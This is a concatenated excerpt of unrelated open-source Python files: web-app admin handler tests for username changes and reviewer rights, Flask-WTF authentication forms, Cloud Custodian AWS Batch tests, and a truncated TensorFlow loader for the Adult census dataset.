generated_response = self.post_json(
'/senddummymailtoadminhandler', {},
csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
generated_response['error'], 'This app cannot send emails.')
class UpdateUsernameHandlerTest(test_utils.GenericTestBase):
"""Tests for updating usernames."""
OLD_USERNAME = 'oldUsername'
NEW_USERNAME = 'newUsername'
def setUp(self):
super(UpdateUsernameHandlerTest, self).setUp()
self.signup(self.ADMIN_EMAIL, self.OLD_USERNAME)
self.login(self.ADMIN_EMAIL, is_super_admin=True)
def test_update_username_with_none_new_username(self):
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/updateusernamehandler',
{
'old_username': self.OLD_USERNAME,
'new_username': None},
csrf_token=csrf_token,
expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid request: A new username must be '
'specified.')
def test_update_username_with_none_old_username(self):
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/updateusernamehandler',
{
'old_username': None,
'new_username': self.NEW_USERNAME},
csrf_token=csrf_token,
expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid request: The old username must be '
'specified.')
def test_update_username_with_non_string_new_username(self):
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/updateusernamehandler',
{
'old_username': self.OLD_USERNAME,
'new_username': 123},
csrf_token=csrf_token,
expected_status_int=400)
self.assertEqual(
response['error'], 'Expected new username to be a unicode '
'string, received 123')
def test_update_username_with_non_string_old_username(self):
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/updateusernamehandler',
{
'old_username': 123,
'new_username': self.NEW_USERNAME},
csrf_token=csrf_token,
expected_status_int=400)
self.assertEqual(
response['error'], 'Expected old username to be a unicode '
'string, received 123')
def test_update_username_with_long_new_username(self):
long_username = 'a' * (constants.MAX_USERNAME_LENGTH + 1)
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/updateusernamehandler',
{
'old_username': self.OLD_USERNAME,
'new_username': long_username},
csrf_token=csrf_token,
expected_status_int=400)
self.assertEqual(
response['error'], 'Expected new username to be less than %s '
'characters, received %s' % (
constants.MAX_USERNAME_LENGTH,
long_username))
def test_update_username_with_nonexistent_old_username(self):
non_existent_username = 'invalid'
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/updateusernamehandler',
{
'old_username': non_existent_username,
'new_username': self.NEW_USERNAME},
csrf_token=csrf_token,
expected_status_int=400)
self.assertEqual(response['error'], 'Invalid username: invalid')
def test_update_username_with_new_username_already_taken(self):
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/updateusernamehandler',
{
'old_username': self.OLD_USERNAME,
'new_username': self.OLD_USERNAME},
csrf_token=csrf_token,
expected_status_int=400)
self.assertEqual(response['error'], 'Username already taken.')
def test_update_username(self):
user_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
csrf_token = self.get_new_csrf_token()
self.put_json(
'/updateusernamehandler',
{
'old_username': self.OLD_USERNAME,
'new_username': self.NEW_USERNAME},
csrf_token=csrf_token)
self.assertEqual(user_services.get_username(user_id), self.NEW_USERNAME)
def test_update_username_creates_audit_model(self):
user_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
csrf_token = self.get_new_csrf_token()
creation_time_in_millisecs = utils.get_current_time_in_millisecs()
mock_get_current_time_in_millisecs = lambda: creation_time_in_millisecs
# Since the UsernameChangeAuditModel's ID is formed from the user ID and
# a millisecond timestamp we need to make sure that
        # get_current_time_in_millisecs returns the same value as we have saved
        # into creation_time_in_millisecs. If we don't force the same value via
        # the swap, flakes can occur, since as time flows the saved milliseconds
        # can differ from the milliseconds saved into the
        # UsernameChangeAuditModel's ID.
with self.swap(
utils, 'get_current_time_in_millisecs',
mock_get_current_time_in_millisecs):
self.put_json(
'/updateusernamehandler',
{
'old_username': self.OLD_USERNAME,
'new_username': self.NEW_USERNAME},
csrf_token=csrf_token)
self.assertTrue(
audit_models.UsernameChangeAuditModel.has_reference_to_user_id(
user_id))
model_id = '%s.%d' % (user_id, creation_time_in_millisecs)
username_change_audit_model = (
audit_models.UsernameChangeAuditModel.get(model_id))
self.assertEqual(username_change_audit_model.committer_id, user_id)
self.assertEqual(
username_change_audit_model.old_username, self.OLD_USERNAME)
self.assertEqual(
username_change_audit_model.new_username, self.NEW_USERNAME)
class AddContributionReviewerHandlerTest(test_utils.GenericTestBase):
"""Tests related to add reviewers for contributor's
suggestion/application.
"""
TRANSLATION_REVIEWER_EMAIL = '[email protected]'
VOICEOVER_REVIEWER_EMAIL = '[email protected]'
QUESTION_REVIEWER_EMAIL = '[email protected]'
def setUp(self):
super(AddContributionReviewerHandlerTest, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.TRANSLATION_REVIEWER_EMAIL, 'translator')
self.signup(self.VOICEOVER_REVIEWER_EMAIL, 'voiceartist')
self.signup(self.QUESTION_REVIEWER_EMAIL, 'question')
self.translation_reviewer_id = self.get_user_id_from_email(
self.TRANSLATION_REVIEWER_EMAIL)
self.voiceover_reviewer_id = self.get_user_id_from_email(
self.VOICEOVER_REVIEWER_EMAIL)
self.question_reviewer_id = self.get_user_id_from_email(
self.QUESTION_REVIEWER_EMAIL)
def test_add_reviewer_with_invalid_username_raise_error(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
response = self.post_json(
'/addcontributionreviewerhandler', {
'username': 'invalid',
'review_category': 'translation',
'language_code': 'en'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid username: invalid')
def test_add_translation_reviewer(self):
self.assertFalse(
user_services.can_review_translation_suggestions(
self.translation_reviewer_id, language_code='hi'))
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
self.post_json(
'/addcontributionreviewerhandler', {
'username': 'translator',
'review_category': 'translation',
'language_code': 'hi'
}, csrf_token=csrf_token)
self.assertTrue(user_services.can_review_translation_suggestions(
self.translation_reviewer_id, language_code='hi'))
def test_add_translation_reviewer_in_invalid_language_raise_error(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
response = self.post_json(
'/addcontributionreviewerhandler', {
'username': 'translator',
'review_category': 'translation',
'language_code': 'invalid'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid language_code: invalid')
def test_assigning_same_language_for_translation_review_raise_error(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
self.assertFalse(
user_services.can_review_translation_suggestions(
self.translation_reviewer_id, language_code='hi'))
csrf_token = self.get_new_csrf_token()
self.post_json(
'/addcontributionreviewerhandler', {
'username': 'translator',
'review_category': 'translation',
'language_code': 'hi'
}, csrf_token=csrf_token)
self.assertTrue(
user_services.can_review_translation_suggestions(
self.translation_reviewer_id, language_code='hi'))
response = self.post_json(
'/addcontributionreviewerhandler', {
'username': 'translator',
'review_category': 'translation',
'language_code': 'hi'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'User translator already has rights to review translation in '
'language code hi')
def test_add_voiceover_reviewer(self):
self.assertFalse(
user_services.can_review_voiceover_applications(
self.voiceover_reviewer_id, language_code='hi'))
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
self.post_json(
'/addcontributionreviewerhandler', {
'username': 'voiceartist',
'review_category': 'voiceover',
'language_code': 'hi'
}, csrf_token=csrf_token)
self.assertTrue(user_services.can_review_voiceover_applications(
self.voiceover_reviewer_id, language_code='hi'))
def test_add_voiceover_reviewer_in_invalid_language(self):
self.assertFalse(
user_services.can_review_voiceover_applications(
self.voiceover_reviewer_id, language_code='hi'))
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
response = self.post_json(
'/addcontributionreviewerhandler', {
'username': 'voiceartist',
'review_category': 'voiceover',
'language_code': 'invalid'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid language_code: invalid')
self.assertFalse(
user_services.can_review_voiceover_applications(
self.voiceover_reviewer_id, language_code='hi'))
def test_assigning_same_language_for_voiceover_review_raise_error(self):
self.assertFalse(
user_services.can_review_voiceover_applications(
self.voiceover_reviewer_id, language_code='hi'))
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
response = self.post_json(
'/addcontributionreviewerhandler', {
'username': 'voiceartist',
'review_category': 'voiceover',
'language_code': 'hi'
}, csrf_token=csrf_token)
self.assertTrue(
user_services.can_review_voiceover_applications(
self.voiceover_reviewer_id, language_code='hi'))
response = self.post_json(
'/addcontributionreviewerhandler', {
'username': 'voiceartist',
'review_category': 'voiceover',
'language_code': 'hi'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'User voiceartist already has rights to review voiceover in '
'language code hi')
def test_add_question_reviewer(self):
self.assertFalse(user_services.can_review_question_suggestions(
self.question_reviewer_id))
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
self.post_json(
'/addcontributionreviewerhandler', {
'username': 'question',
'review_category': 'question'
}, csrf_token=csrf_token)
self.assertTrue(user_services.can_review_question_suggestions(
self.question_reviewer_id))
def test_assigning_same_user_as_question_reviewer_raise_error(self):
self.assertFalse(user_services.can_review_question_suggestions(
self.question_reviewer_id))
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
response = self.post_json(
'/addcontributionreviewerhandler', {
'username': 'question',
'review_category': 'question'
}, csrf_token=csrf_token)
self.assertTrue(user_services.can_review_question_suggestions(
self.question_reviewer_id))
response = self.post_json(
'/addcontributionreviewerhandler', {
'username': 'question',
'review_category': 'question'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'User question already has rights to review question.')
def test_add_reviewer_for_invalid_review_category_raise_error(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
response = self.post_json(
'/addcontributionreviewerhandler', {
'username': 'question',
'review_category': 'invalid'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid review_category: invalid')
class RemoveContributionReviewerHandlerTest(test_utils.GenericTestBase):
"""Tests related to remove reviewers from contributor dashboard page."""
TRANSLATION_REVIEWER_EMAIL = '[email protected]'
VOICEOVER_REVIEWER_EMAIL = '[email protected]'
QUESTION_REVIEWER_EMAIL = '[email protected]'
def setUp(self):
super(RemoveContributionReviewerHandlerTest, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.TRANSLATION_REVIEWER_EMAIL, 'translator')
self.signup(self.VOICEOVER_REVIEWER_EMAIL, 'voiceartist')
self.signup(self.QUESTION_REVIEWER_EMAIL, 'question')
self.translation_reviewer_id = self.get_user_id_from_email(
self.TRANSLATION_REVIEWER_EMAIL)
self.voiceover_reviewer_id = self.get_user_id_from_email(
self.VOICEOVER_REVIEWER_EMAIL)
self.question_reviewer_id = self.get_user_id_from_email(
self.QUESTION_REVIEWER_EMAIL)
def test_add_reviewer_without_username_raise_error(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/removecontributionreviewerhandler', {
'removal_type': 'all'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(response['error'], 'Missing username param')
def test_add_reviewer_with_invalid_username_raise_error(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/removecontributionreviewerhandler', {
'username': 'invalid',
'removal_type': 'all'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid username: invalid')
def test_remove_translation_reviewer(self):
self.assertFalse(
user_services.can_review_translation_suggestions(
self.translation_reviewer_id, language_code='hi'))
user_services.allow_user_to_review_translation_in_language(
self.translation_reviewer_id, 'hi')
self.assertTrue(
user_services.can_review_translation_suggestions(
self.translation_reviewer_id, language_code='hi'))
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
self.put_json(
'/removecontributionreviewerhandler', {
'username': 'translator',
'removal_type': 'specific',
'review_category': 'translation',
'language_code': 'hi'
}, csrf_token=csrf_token)
self.assertFalse(user_services.can_review_translation_suggestions(
self.translation_reviewer_id, language_code='hi'))
def test_remove_translation_reviewer_in_invalid_language_raise_error(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/removecontributionreviewerhandler', {
'username': 'translator',
'removal_type': 'specific',
'review_category': 'translation',
'language_code': 'invalid'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid language_code: invalid')
def test_remove_unassigned_translation_reviewer_raise_error(self):
self.assertFalse(
user_services.can_review_translation_suggestions(
self.translation_reviewer_id, language_code='hi'))
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/removecontributionreviewerhandler', {
'username': 'translator',
'removal_type': 'specific',
'review_category': 'translation',
'language_code': 'hi'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'translator does not have rights to review translation in language '
'hi.')
def test_remove_voiceover_reviewer(self):
self.assertFalse(
user_services.can_review_voiceover_applications(
self.voiceover_reviewer_id, language_code='hi'))
user_services.allow_user_to_review_voiceover_in_language(
self.voiceover_reviewer_id, 'hi')
self.assertTrue(
user_services.can_review_voiceover_applications(
self.voiceover_reviewer_id, language_code='hi'))
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
self.put_json(
'/removecontributionreviewerhandler', {
'username': 'voiceartist',
'removal_type': 'specific',
'review_category': 'voiceover',
'language_code': 'hi'
}, csrf_token=csrf_token)
self.assertFalse(user_services.can_review_voiceover_applications(
self.translation_reviewer_id, language_code='hi'))
def test_remove_voiceover_reviewer_in_invalid_language_raise_error(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/removecontributionreviewerhandler', {
'username': 'voiceartist',
'removal_type': 'specific',
'review_category': 'voiceover',
'language_code': 'invalid'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid language_code: invalid')
def test_remove_unassigned_voiceover_reviewer_raise_error(self):
self.assertFalse(
user_services.can_review_voiceover_applications(
self.translation_reviewer_id, language_code='hi'))
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/removecontributionreviewerhandler', {
'username': 'voiceartist',
'removal_type': 'specific',
'review_category': 'voiceover',
'language_code': 'hi'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'voiceartist does not have rights to review voiceover in language '
'hi.')
def test_remove_question_reviewer(self):
user_services.allow_user_to_review_question(self.question_reviewer_id)
self.assertTrue(user_services.can_review_question_suggestions(
self.question_reviewer_id))
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
self.put_json(
'/removecontributionreviewerhandler', {
'username': 'question',
'removal_type': 'specific',
'review_category': 'question'
}, csrf_token=csrf_token)
self.assertFalse(user_services.can_review_question_suggestions(
self.question_reviewer_id))
def test_removing_unassigned_question_reviewer_raise_error(self):
self.assertFalse(user_services.can_review_question_suggestions(
self.question_reviewer_id))
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/removecontributionreviewerhandler', {
'username': 'question',
'removal_type': 'specific',
'review_category': 'question'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'],
'question does not have rights to review question.')
def test_remove_reviewer_for_invalid_review_category_raise_error(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/removecontributionreviewerhandler', {
'username': 'question',
'removal_type': 'specific',
'review_category': 'invalid'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid review_category: invalid')
def test_remove_reviewer_for_invalid_removal_type_raise_error(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
response = self.put_json(
'/removecontributionreviewerhandler', {
'username': 'question',
'removal_type': 'invalid'
}, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid removal_type: invalid')
def test_remove_reviewer_from_all_reviewable_items(self):
user_services.allow_user_to_review_question(
self.translation_reviewer_id)
self.assertTrue(user_services.can_review_question_suggestions(
self.translation_reviewer_id))
user_services.allow_user_to_review_voiceover_in_language(
self.translation_reviewer_id, 'hi')
self.assertTrue(
user_services.can_review_voiceover_applications(
self.translation_reviewer_id, language_code='hi'))
user_services.allow_user_to_review_translation_in_language(
self.translation_reviewer_id, 'hi')
self.assertTrue(
user_services.can_review_translation_suggestions(
self.translation_reviewer_id, language_code='hi'))
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
self.put_json(
'/removecontributionreviewerhandler', {
'username': 'translator',
'removal_type': 'all'
}, csrf_token=csrf_token)
self.assertFalse(user_services.can_review_question_suggestions(
self.translation_reviewer_id))
self.assertFalse(
user_services.can_review_voiceover_applications(
self.translation_reviewer_id, language_code='hi'))
self.assertFalse(
user_services.can_review_translation_suggestions(
self.translation_reviewer_id, language_code='hi'))
class ContributionReviewersListHandlerTest(test_utils.GenericTestBase):
"""Tests ContributionReviewersListHandler."""
TRANSLATION_REVIEWER_EMAIL = '[email protected]'
VOICEOVER_REVIEWER_EMAIL = '[email protected]'
QUESTION_REVIEWER_EMAIL = '[email protected]'
def setUp(self):
super(ContributionReviewersListHandlerTest, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.TRANSLATION_REVIEWER_EMAIL, 'translator')
self.signup(self.VOICEOVER_REVIEWER_EMAIL, 'voiceartist')
self.signup(self.QUESTION_REVIEWER_EMAIL, 'question')
self.translation_reviewer_id = self.get_user_id_from_email(
self.TRANSLATION_REVIEWER_EMAIL)
self.voiceover_reviewer_id = self.get_user_id_from_email(
self.VOICEOVER_REVIEWER_EMAIL)
self.question_reviewer_id = self.get_user_id_from_email(
self.QUESTION_REVIEWER_EMAIL)
def test_check_contribution_reviewer_by_translation_reviewer_role(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
user_services.allow_user_to_review_translation_in_language(
self.translation_reviewer_id, 'hi')
user_services.allow_user_to_review_translation_in_language(
self.voiceover_reviewer_id, 'hi')
response = self.get_json(
'/getcontributionreviewershandler', params={
'review_category': 'translation',
'language_code': 'hi'
})
self.assertEqual(len(response['usernames']), 2)
self.assertTrue('translator' in response['usernames'])
self.assertTrue('voiceartist' in response['usernames'])
def test_check_contribution_reviewer_by_voiceover_reviewer_role(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
user_services.allow_user_to_review_voiceover_in_language(
self.translation_reviewer_id, 'hi')
user_services.allow_user_to_review_voiceover_in_language(
self.voiceover_reviewer_id, 'hi')
response = self.get_json(
'/getcontributionreviewershandler', params={
'review_category': 'voiceover',
'language_code': 'hi'
})
self.assertEqual(len(response['usernames']), 2)
self.assertTrue('translator' in response['usernames'])
self.assertTrue('voiceartist' in response['usernames'])
def test_check_contribution_reviewer_by_question_reviewer_role(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
user_services.allow_user_to_review_question(self.question_reviewer_id)
user_services.allow_user_to_review_question(self.voiceover_reviewer_id)
response = self.get_json(
'/getcontributionreviewershandler', params={
'review_category': 'question'
})
self.assertEqual(len(response['usernames']), 2)
self.assertTrue('question' in response['usernames'])
self.assertTrue('voiceartist' in response['usernames'])
def test_check_contribution_reviewer_with_invalid_language_code_raise_error(
self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
response = self.get_json(
'/getcontributionreviewershandler', params={
'review_category': 'voiceover',
'language_code': 'invalid'
}, expected_status_int=400)
self.assertEqual(response['error'], 'Invalid language_code: invalid')
self.logout()
def test_check_contribution_reviewer_with_invalid_review_category_raise_error( # pylint: disable=line-too-long
self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
response = self.get_json(
'/getcontributionreviewershandler', params={
'review_category': 'invalid',
'language_code': 'hi'
}, expected_status_int=400)
self.assertEqual(response['error'], 'Invalid review_category: invalid')
self.logout()
class ContributionReviewerRightsDataHandlerTest(test_utils.GenericTestBase):
"""Tests ContributionReviewerRightsDataHandler."""
REVIEWER_EMAIL = '[email protected]'
def setUp(self):
super(ContributionReviewerRightsDataHandlerTest, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.REVIEWER_EMAIL, 'reviewer')
self.reviewer_id = self.get_user_id_from_email(self.REVIEWER_EMAIL)
def test_check_contribution_reviewer_rights(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
response = self.get_json(
'/contributionreviewerrightsdatahandler', params={
'username': 'reviewer'
})
self.assertEqual(
response['can_review_translation_for_language_codes'], [])
self.assertEqual(
response['can_review_voiceover_for_language_codes'], [])
self.assertEqual(response['can_review_questions'], False)
user_services.allow_user_to_review_question(self.reviewer_id)
user_services.allow_user_to_review_voiceover_in_language(
self.reviewer_id, 'hi')
user_services.allow_user_to_review_translation_in_language(
self.reviewer_id, 'hi')
response = self.get_json(
'/contributionreviewerrightsdatahandler', params={
'username': 'reviewer'
})
self.assertEqual(
response['can_review_translation_for_language_codes'], ['hi'])
self.assertEqual(
response['can_review_voiceover_for_language_codes'], ['hi'])
self.assertEqual(response['can_review_questions'], True)
def test_check_contribution_reviewer_rights_invalid_username(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
response = self.get_json(
'/contributionreviewerrightsdatahandler', params={
'username': 'invalid'
}, expected_status_int=400)
self.assertEqual(response['error'], 'Invalid username: invalid')
self.logout()
def test_check_contribution_reviewer_rights_without_username(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
response = self.get_json(
'/contributionreviewerrightsdatahandler', params={},
expected_status_int=400)
self.assertEqual(response['error'], 'Missing username param')
self.logout()
| apache-2.0 | -4,891,581,027,496,295,000 | 38.854401 | 114 | 0.606186 | false |
Tust-Celitea/celitea_portal_ng | app/auth/forms.py | 1 | 3777 | import flask_wtf
import wtforms
from wtforms.validators import DataRequired, Length, Email, Regexp, EqualTo
from ..models import User
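# Note for English readers: the user-facing labels and validation messages in
# the forms below are written in Chinese (plus kaomoji). Roughly: 电子邮件地址 /
# 邮件地址 = "email address", 密码 = "password", 用户名 = "username", 登录 = "log in",
# 注册 = "register", 旧密码 / 新密码 = "old / new password", 更改密码 = "change password",
# "两次输入的密码不一样" = "the two passwords entered do not match", and
# "这个邮箱/用户名注册过啦" = "this email / username is already registered".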
class LoginForm(flask_wtf.FlaskForm):
email = wtforms.StringField('电子邮件地址', validators=[DataRequired(), Length(1, 64),
Email()])
password = wtforms.PasswordField('密码', validators=[DataRequired()])
remember_me = wtforms.BooleanField('在本次会话中保存登录状态')
submit = wtforms.SubmitField('登录')
class RegistrationForm(flask_wtf.FlaskForm):
email = wtforms.StringField('电子邮件地址', validators=[DataRequired(), Length(1, 64),
Email()])
username = wtforms.StringField('用户名', validators=[
DataRequired(), Length(1, 64), Regexp('^[A-Za-z][A-Za-z0-9_.]*$', 0,
' (╯・∧・)╯ ┻━┻ 用户名只能包含字母,数字和下划线。 ')])
password = wtforms.PasswordField('密码', validators=[
DataRequired(), EqualTo('password2', message='(╯=﹁"﹁=)╯ ┻━┻ 两次输入的密码不一样')])
password2 = wtforms.PasswordField('重复密码', validators=[DataRequired()])
submit = wtforms.SubmitField('注册')
def validate_email(self, field):
if User.query.filter_by(email=field.data).first():
raise wtforms.ValidationError('(ノ`Д´)ノ┻━┻ 这个邮箱注册过啦~<br />或许汝需要试试 <a href="/auth/login">登录</a>?')
def validate_username(self, field):
if User.query.filter_by(username=field.data).first():
raise wtforms.ValidationError('(ノ`Д´)ノ┻━┻ 这个用户名注册过啦~')
class ChangePasswordForm(flask_wtf.FlaskForm):
old_password = wtforms.PasswordField('旧密码', validators=[DataRequired()])
password = wtforms.PasswordField('新密码', validators=[
DataRequired(), EqualTo('password2', message='(╯=﹁"﹁=)╯ ┻━┻ 两次输入的密码不一样')])
password2 = wtforms.PasswordField('重复一遍新密码', validators=[DataRequired()])
submit = wtforms.SubmitField('更改密码 | ω・`)')
class PasswordResetRequestForm(flask_wtf.FlaskForm):
email = wtforms.StringField('邮件地址', validators=[DataRequired(), Length(1, 64),
Email()])
submit = wtforms.SubmitField('发送密码重置邮件,Biu~')
class PasswordResetForm(flask_wtf.FlaskForm):
email = wtforms.StringField('邮件地址', validators=[DataRequired(), Length(1, 64),
Email()])
password = wtforms.PasswordField('新密码', validators=[
DataRequired(), EqualTo('password2', message='(╯=﹁"﹁=)╯ ┻━┻ 两次输入的密码不一样')])
password2 = wtforms.PasswordField('重复一遍新密码', validators=[DataRequired()])
submit = wtforms.SubmitField('更改密码 | ω・`)')
def validate_email(self, field):
if User.query.filter_by(email=field.data).first() is None:
raise wtforms.ValidationError('咦?这个邮件地址咱好像不认识 😂 ')
class ChangeEmailForm(flask_wtf.FlaskForm):
email = wtforms.StringField('新的邮件地址', validators=[DataRequired(), Length(1, 64),
Email()])
password = wtforms.PasswordField('密码', validators=[DataRequired()])
submit = wtforms.SubmitField('更改邮件地址| ω・`)')
def validate_email(self, field):
if User.query.filter_by(email=field.data).first():
raise wtforms.ValidationError('(ノ`Д´)ノ┻━┻ 这个邮箱注册过啦~')
| gpl-3.0 | -548,536,487,658,854,460 | 45.814286 | 108 | 0.611535 | false |
capitalone/cloud-custodian | tests/test_batch.py | 1 | 2707 | # Copyright 2018 Capital One Services, LLC
# Copyright The Cloud Custodian Authors.
# SPDX-License-Identifier: Apache-2.0
from .common import BaseTest
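# These tests replay pre-recorded AWS API responses ("flight data"), so the
# batch-compute and batch-definition policies are exercised without touching a
# real AWS account.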
class TestBatchComputeEnvironment(BaseTest):
def test_batch_compute_update(self):
session_factory = self.replay_flight_data("test_batch_compute_update")
p = self.load_policy(
{
"name": "batch-compute",
"resource": "batch-compute",
"filters": [{"computeResources.desiredvCpus": 0}, {"state": "ENABLED"}],
"actions": [{"type": "update-environment", "state": "DISABLED"}],
},
session_factory=session_factory,
)
resources = p.run()
self.assertEqual(len(resources), 1)
client = session_factory().client("batch")
envs = client.describe_compute_environments(
computeEnvironments=[resources[0]["computeEnvironmentName"]]
)[
"computeEnvironments"
]
self.assertEqual(envs[0]["state"], "DISABLED")
def test_batch_compute_delete(self):
session_factory = self.replay_flight_data("test_batch_compute_delete")
p = self.load_policy(
{
"name": "batch-compute",
"resource": "batch-compute",
"filters": [{"computeResources.desiredvCpus": 0}],
"actions": [{"type": "delete"}],
},
session_factory=session_factory,
)
resources = p.run()
self.assertEqual(len(resources), 1)
client = session_factory().client("batch")
envs = client.describe_compute_environments(
computeEnvironments=[resources[0]['computeEnvironmentName']]
)['computeEnvironments']
self.assertEqual(envs[0]['status'], 'DELETING')
class TestBatchDefinition(BaseTest):
def test_definition_deregister(self):
def_name = 'c7n_batch'
session_factory = self.replay_flight_data(
'test_batch_definition_deregister')
p = self.load_policy({
'name': 'batch-definition',
'resource': 'batch-definition',
'filters': [
{'containerProperties.image': 'amazonlinux'}],
'actions': [{'type': 'deregister'}]
}, session_factory=session_factory)
resources = p.run()
self.assertEqual(len(resources), 1)
self.assertEqual(resources[0]['jobDefinitionName'], 'c7n_batch')
client = session_factory(region='us-east-1').client('batch')
defs = client.describe_job_definitions(
jobDefinitionName=def_name)['jobDefinitions']
self.assertEqual(defs[0]['status'], 'INACTIVE')
| apache-2.0 | 7,499,708,579,604,423,000 | 38.231884 | 88 | 0.58478 | false |
HaprianVlad/TensorFlowProjects | LinearModels/dataHandler.py | 1 | 5358 | import tempfile
import urllib.request
import pandas as pd
import os
import tensorflow as tf
# DATA LABELS
LABEL_COLUMN = "label"
CATEGORICAL_COLUMNS = ["workclass", "education", "marital_status", "occupation",
"relationship", "race", "gender", "native_country"]
CONTINUOUS_COLUMNS = ["age", "education_num", "capital_gain", "capital_loss", "hours_per_week"]
COLUMNS = ["age", "workclass", "fnlwgt", "education", "education_num",
"marital_status", "occupation", "relationship", "race", "gender",
"capital_gain", "capital_loss", "hours_per_week", "native_country",
"income_bracket"]
def read_data():
print("Data is loading ...")
data_dir = "data"
train_file_name = data_dir + "/train_file.dat"
test_file_name = data_dir + "/test_file.dat"
if not os.path.exists(data_dir):
os.makedirs(data_dir)
if os.path.exists(train_file_name):
train_file = open(train_file_name, "r")
else:
train_file = open(train_file_name, "w+")
urllib.request.urlretrieve("https://archive.ics.uci.edu/ml/machine-learning-databases/adult/adult.data", train_file.name)
if os.path.exists(test_file_name):
test_file = open(test_file_name, "r")
else:
test_file = open(test_file_name, "w+")
urllib.request.urlretrieve("https://archive.ics.uci.edu/ml/machine-learning-databases/adult/adult.data", test_file.name)
df_train = pd.read_csv(train_file, names=COLUMNS, skipinitialspace=True)
df_test = pd.read_csv(test_file, names=COLUMNS, skipinitialspace=True, skiprows=1)
df_train[LABEL_COLUMN] = (df_train["income_bracket"].apply(lambda x: ">50K" in x)).astype(int)
df_test[LABEL_COLUMN] = (df_test["income_bracket"].apply(lambda x: ">50K" in x)).astype(int)
print("Data loading done!")
train_file.close();
test_file.close();
return [df_train, df_test]
# CREATE A TENSOR MODEL. This is represented as a dictionary: feature_name -> feature_tensor
def input_fn(df):
# Creates a dictionary mapping from each continuous feature column name (k) to
# the values of that column stored in a constant Tensor.
continuous_cols = {k: tf.constant(df[k].values) for k in CONTINUOUS_COLUMNS}
# Creates a dictionary mapping from each categorical feature column name (k)
